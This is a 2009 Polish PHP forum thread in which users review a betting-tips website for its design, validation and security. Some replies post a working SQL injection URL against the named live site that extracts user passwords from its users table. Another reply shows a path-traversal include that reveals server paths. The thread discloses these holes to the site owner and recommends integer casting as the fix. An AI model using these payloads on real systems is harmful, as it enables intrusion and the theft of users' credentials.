Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> [strona] www.tktbet.pl - bukmacherska strona
mczlowiek
post 10.07.2009, 10:37:07
Post #1





Grupa: Zarejestrowani
Postów: 210
Pomógł: 0
Dołączył: 26.05.2008

Ostrzeżenie: (10%)
X----


witam,
strona praktycznie skończona, dlatego proszę o ocenę zarówno pod względem wizualnym jak i pod względem poprawności kodu i działania.

Z gory dziekuję za wszystkie uwagi, szczególnie te krytyczne!

Pozdrawiam!

Odwiedź moją stronę

Ten post edytował mczlowiek 10.07.2009, 10:37:54
Go to the top of the page
+Quote Post
2 Stron V   1 2 >  
Start new topic
Odpowiedzi (1 - 19)
DawidPaszek
post 10.07.2009, 10:44:25
Post #2





Grupa: Zarejestrowani
Postów: 36
Pomógł: 0
Dołączył: 31.03.2007

Ostrzeżenie: (10%)
X----


w3c


http://validator.w3.org/check?uri=http%3A%...ine&group=0

http://jigsaw.w3.org/css-validator/validat...&lang=pl-PL



brak filtracji danych wejsciowych

http://www.tktbet.pl/index.php?id=typy&typy_id=--



wyszukiwarka ie6

http://www.tktbet.pl/index.php (wyszukiwarka w gornej czesci strony, schodzi pod top, w tlo sie laduje)


seo

- brak zmiany title oraz description dla podstron


wizualnie

- menu ktore jest rozwijane spod glownego gornego menu jest dla mnie nie widoczne

- " InLive! 2 visitors on the site. " brzydko wyglada


Pozatym strona jest ładna wizualnie.

Ten post edytował DawidPaszek 10.07.2009, 10:46:15


--------------------
PASZEK INC
Go to the top of the page
+Quote Post
mczlowiek
post 10.07.2009, 10:50:42
Post #3





Grupa: Zarejestrowani
Postów: 210
Pomógł: 0
Dołączył: 26.05.2008

Ostrzeżenie: (10%)
X----


Cytat(DawidPaszek @ 10.07.2009, 11:44:25 ) *
w3c


http://validator.w3.org/check?uri=http%3A%...ine&group=0

http://jigsaw.w3.org/css-validator/validat...&lang=pl-PL



brak filtracji danych wejsciowych

http://www.tktbet.pl/index.php?id=typy&typy_id=--



wyszukiwarka ie6

http://www.tktbet.pl/index.php (wyszukiwarka w gornej czesci strony, schodzi pod top, w tlo sie laduje)


seo

- brak zmiany title oraz description dla podstron


wizualnie

- menu ktore jest rozwijane spod glownego gornego menu jest dla mnie nie widoczne

- " InLive! 2 visitors on the site. " brzydko wyglada


Pozatym strona jest ładna wizualnie.

brak filtracji danych wejsciowych - jak to uzyskać?
seo - jak wyżej
wyszukiwarka ie6 - nie wiem dokładnie o co chodzi smile.gif

Go to the top of the page
+Quote Post
Quantum
post 10.07.2009, 11:05:35
Post #4





Grupa: Zarejestrowani
Postów: 450
Pomógł: 84
Dołączył: 27.11.2008
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


No to tak, wizualnie mi się podoba, jedynie przycisk od wyszukiwarki google(ten niebieski) nie pasuje raczej do kolorystki strony.

Od strony kodowania, jedynie za menu na <ul> + smile.gif.. reszta = xhtml( 398 błędów + 170 ostrzeżeń ) + css( 13 błędów + 167 ostrzeżeń ) według w3c winksmiley.jpg
Go to the top of the page
+Quote Post
Kildyt
post 10.07.2009, 11:12:41
Post #5





Grupa: Zarejestrowani
Postów: 869
Pomógł: 53
Dołączył: 20.10.2003
Skąd: Przeworsk

Ostrzeżenie: (0%)
-----


Przecież był już jeden topic o tej stronie. Zmiany są aż tak generalne, że trzeba zakładać nowy topic?

Logotyp mi się nie podoba. Te ludziki z wykresem nic mi nie mówią, a sam napis jest zbyt prosty.
Generalnie są za małe padding'i.
Co do kodu to nawet ładnie. IMHO nie ma czegoś takiego jak puste alt-y.


--------------------
Go to the top of the page
+Quote Post
pyro
post 10.07.2009, 11:20:00
Post #6





Grupa: Zarejestrowani
Postów: 2 148
Pomógł: 230
Dołączył: 26.03.2008

Ostrzeżenie: (0%)
-----


1. Wyszukiwarkę można było własną zrobić
2. BRAK STOPKI!
3. podatnośc na SQL Injection
Kod
http://www.tktbet.pl/index.php?id=typy&typy_id=262%20and%201=0%20UNION%20SELECT%201,[CIACH! Wyciągłem kolumnę z loginem usera w razie jakby innych korciło;)],user_password,4,5,6,7,8,9,10,11,12,13,14,15%20FROM%20users%20LIMIT%201;--


I mamy ładnie podane login i hasło userów w postaci

[login] - [hasło]

Filtruj dane.

Ten post edytował pyro 10.07.2009, 11:21:24


--------------------
ET LINGUA EIUS LOQUETUR IUDICIUM
Go to the top of the page
+Quote Post
mczlowiek
post 10.07.2009, 11:38:30
Post #7





Grupa: Zarejestrowani
Postów: 210
Pomógł: 0
Dołączył: 26.05.2008

Ostrzeżenie: (10%)
X----


odp 3

możesz mi przesłać na prv cale zapytanie (bez wycinania) chce zobaczyć jak to wygląda oraz jak się można przed tym obronic?

Ten post edytował mczlowiek 10.07.2009, 11:39:27
Go to the top of the page
+Quote Post
drake88
post 10.07.2009, 11:40:25
Post #8





Grupa: Zarejestrowani
Postów: 283
Pomógł: 15
Dołączył: 22.03.2009
Skąd: Bytów

Ostrzeżenie: (0%)
-----


Bardzo ładna strona.


--------------------
Go to the top of the page
+Quote Post
pyro
post 10.07.2009, 11:53:38
Post #9





Grupa: Zarejestrowani
Postów: 2 148
Pomógł: 230
Dołączył: 26.03.2008

Ostrzeżenie: (0%)
-----


Cytat(mczlowiek @ 10.07.2009, 12:38:30 ) *
odp 3

możesz mi przesłać na prv cale zapytanie (bez wycinania) chce zobaczyć jak to wygląda oraz jak się można przed tym obronic?


Wystarczy, że zamiast w miejsce [CIACH... blablabla] wstawisz kolumnę z loginem usera i otrzymasz na stronie postać jak podałem wyżej (hasło jest kodowane w md5, ale w dzisiejszych czasach można ich łamać kilka milionów na sekundę, więc to tylko kwestia czasu, żeby je złamać).

Zabezpieczenie? W tym przypadku przez parametr GET jest przesyłana dana liczbowa i w skrypcie też chcemy, żeby ona była liczbą, więc wystarczy rzutowanie typów, zajrzyj: intval" title="Zobacz w manualu PHP" target="_manual


--------------------
ET LINGUA EIUS LOQUETUR IUDICIUM
Go to the top of the page
+Quote Post
mczlowiek
post 10.07.2009, 12:02:50
Post #10





Grupa: Zarejestrowani
Postów: 210
Pomógł: 0
Dołączył: 26.05.2008

Ostrzeżenie: (10%)
X----


robię tak jak mówisz i nic mi się nie wyświetla...
Go to the top of the page
+Quote Post
pyro
post 10.07.2009, 12:06:37
Post #11





Grupa: Zarejestrowani
Postów: 2 148
Pomógł: 230
Dołączył: 26.03.2008

Ostrzeżenie: (0%)
-----


Nadal nie podałem kolumny z loginem usera, zamiast tego wstawiłem liczbę:

Kod
http://www.tktbet.pl/index.php?id=typy&typy_id=262%20and%201=0%20UNION%20SELECT%201,2,user_password,4,5,6,7,8,9,10,11,12,13,14,15%20FROM%20users%20LIMIT%201;--


Wyświetli samo hasło


--------------------
ET LINGUA EIUS LOQUETUR IUDICIUM
Go to the top of the page
+Quote Post
mczlowiek
post 10.07.2009, 12:24:30
Post #12





Grupa: Zarejestrowani
Postów: 210
Pomógł: 0
Dołączył: 26.05.2008

Ostrzeżenie: (10%)
X----


ale gdzie ty to wklejasz? mi zawsze wyswietla sie pusta strona...
Go to the top of the page
+Quote Post
pyro
post 10.07.2009, 12:55:21
Post #13





Grupa: Zarejestrowani
Postów: 2 148
Pomógł: 230
Dołączył: 26.03.2008

Ostrzeżenie: (0%)
-----


Do paska URL, ma w nim być taki ciąg.


--------------------
ET LINGUA EIUS LOQUETUR IUDICIUM
Go to the top of the page
+Quote Post
mczlowiek
post 10.07.2009, 12:57:35
Post #14





Grupa: Zarejestrowani
Postów: 210
Pomógł: 0
Dołączył: 26.05.2008

Ostrzeżenie: (10%)
X----


dokładnie tak robię i wyświetla mi sie pusta strona a w ie brak strony...
Go to the top of the page
+Quote Post
pyro
post 10.07.2009, 13:00:17
Post #15





Grupa: Zarejestrowani
Postów: 2 148
Pomógł: 230
Dołączył: 26.03.2008

Ostrzeżenie: (0%)
-----


To robisz jakiś błąd ze swojej strony, osobiscie nie wiem jaki tongue.gif


--------------------
ET LINGUA EIUS LOQUETUR IUDICIUM
Go to the top of the page
+Quote Post
Quantum
post 10.07.2009, 15:17:40
Post #16





Grupa: Zarejestrowani
Postów: 450
Pomógł: 84
Dołączył: 27.11.2008
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


http://www.tktbet.pl/index.php?id=../index

wynik:
Kod
<b>Fatal error</b>:  Cannot redeclare zamieniaj() (previously declared in /tktbetpl/domains/tktbetpl.twojhost.pl/public_html/index.php:168) in <b>/tktbetpl/domains/tktbetpl.twojhost.pl/public_html/index.php</b> on line <b>176</b>


ekhm.. tym sposobem mogę zaincludować jakikolwiek plik .php z jakiegokolwiek katalogu.. snitch.gif
Go to the top of the page
+Quote Post
DawidPaszek
post 10.07.2009, 15:47:41
Post #17





Grupa: Zarejestrowani
Postów: 36
Pomógł: 0
Dołączył: 31.03.2007

Ostrzeżenie: (10%)
X----


http://i29.tinypic.com/2qwo474.gif

Miłego dnia.


--------------------
PASZEK INC
Go to the top of the page
+Quote Post
pyro
post 10.07.2009, 15:53:09
Post #18





Grupa: Zarejestrowani
Postów: 2 148
Pomógł: 230
Dołączył: 26.03.2008

Ostrzeżenie: (0%)
-----


Cytat(DawidPaszek @ 10.07.2009, 16:47:41 ) *


DawidPaszek, chciałeś się popisać czy co? Przez większość tematu mówię o tym autorowi tematu. Gratuluję, potrafiłeś wykorzystać gotowo podaną lukę z gotowym zapytaniem, które sam podałem. Ehh...

// edit (do autora)

Jeszcze zauważyłem, że jak się poda błędny login/hasło to przekierowuje na główną stronę bez niczego. Żadnego komunikatu, ani nic...

Ten post edytował pyro 10.07.2009, 16:03:25


--------------------
ET LINGUA EIUS LOQUETUR IUDICIUM
Go to the top of the page
+Quote Post
DawidPaszek
post 10.07.2009, 16:07:43
Post #19





Grupa: Zarejestrowani
Postów: 36
Pomógł: 0
Dołączył: 31.03.2007

Ostrzeżenie: (10%)
X----


Cytat(pyro @ 10.07.2009, 16:53:09 ) *
DawidPaszek, chciałeś się popisać czy co? Przez większość tematu mówię o tym autorowi tematu. Gratuluję, potrafiłeś wykorzystać gotowo podaną lukę z gotowym zapytaniem, które sam podałem. Ehh...


Pyro,

Nie przejmuj się. Wszyscy wiedzą że to Ty znalazłeś tą lukę i nie przypisuje do siebie praw,
jego znalezienia. Podałem to tylko na obrazkach, które wizualizują to co napisałeś w słowach.
Grauluję z sukcesem przeprowadzenoj symulacji ataku sql.


Dawid Paszek.


--------------------
PASZEK INC
Go to the top of the page
+Quote Post
mczlowiek
post 10.07.2009, 16:12:59
Post #20





Grupa: Zarejestrowani
Postów: 210
Pomógł: 0
Dołączył: 26.05.2008

Ostrzeżenie: (10%)
X----


pomoż mi usunąc ten "pzypadek"
Go to the top of the page
+Quote Post

2 Stron V   1 2 >
Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 14.08.2025 - 09:53